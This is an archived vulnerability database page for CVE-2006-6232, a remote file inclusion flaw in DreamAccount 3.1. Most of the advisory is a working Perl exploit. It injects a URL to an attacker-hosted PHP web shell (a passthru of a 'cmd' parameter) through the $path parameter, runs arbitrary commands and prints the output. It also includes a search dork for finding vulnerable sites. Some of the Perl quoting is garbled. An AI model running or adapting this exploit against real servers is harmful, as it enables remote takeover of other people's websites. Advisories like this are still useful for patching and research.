|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 1949 CVE : CVE-2006-6232 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Drago84(Exclusive Security Team) Published : 05.12.2006
Advisory Content : ---------------------------------------------------- DREAMACCOUNT V3.1 Command Execution Exploit ---------------------------------------------------- Discovered By CrAsh_oVeR_rIdE(Arabian Security Team) Coded By Drago84(Exclusive Security Team) ---------------------------------------------------- site of script:http://dreamcost.com ---------------------------------------------------- Vulnerable: DREAMACCOUNT V3.1 ---------------------------------------------------- vulnerable file : ------------------ /admin/index.php ---------------------------------------------------- vulnerable code: ---------------------------------------------------- require($path . "setup.php"); require($path . "functions.php"); require($path . "payment_processing.inc.php"); $path parameter File inclusion ---------------------------------------------------- #!/usr/bin/perl use HTTP::Request; use LWP::UserAgent; "n===================================================================== ========rn"; print " * Dreamaccount Remote Command Execution 23/06/06 *rn"; "======================================================================= ======rn"; print "[*] dork:"powered by DreamAccount 3.1"n"; print "[*] Coded By : Drago84 n"; print "[*] Discovered by CrAsH_oVeR_rIdEn"; print "[*] Use <site> <dir_Dream> <eval site> <cmd>n"; print " Into the Eval Site it must be:nn"; print " Exclusive <?php passthru($_GET[cmd]); ?> /Exclusive"; if (@ARGV < 4) { print "nn[*] usage: perl dream.pl <site> <dir dream> <eval site> <cmd>n"; print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/ http://www.site.org/doc.jpg idn"; print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) n"; exit(); } my $dir=$ARGV[1]; my $host=$ARGV[0]; my $eval=$ARGV[2]; my $cmd=$ARGV[3]; my $url2=$host.$dir."/admin/index.php?path=".$eval."?&cmd=".$cmd; print "n"; my $req=HTTP::Request->new(GET=>$url2); my $ua=LWP::UserAgent->new(); $ua->timeout(10); my $response=$ua->request($req); if ($response->is_success) { print "nnResult of:".$cmd."n"; my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)/Exclusive}smx ); printf $1; $response->content; print "n"; } ------------------------------------------------------------------------ ---------------------------- Discovered By CrAsh_oVeR_rIdE Coded By Drago84 E-mail:KARKOR23 (at) hotmail (dot) com [email concealed] Site:www.lezr.com Greetz:KING-HACKER,YOUNG_HACKER ,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr .hcR AND ALL LEZR.COM Member  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |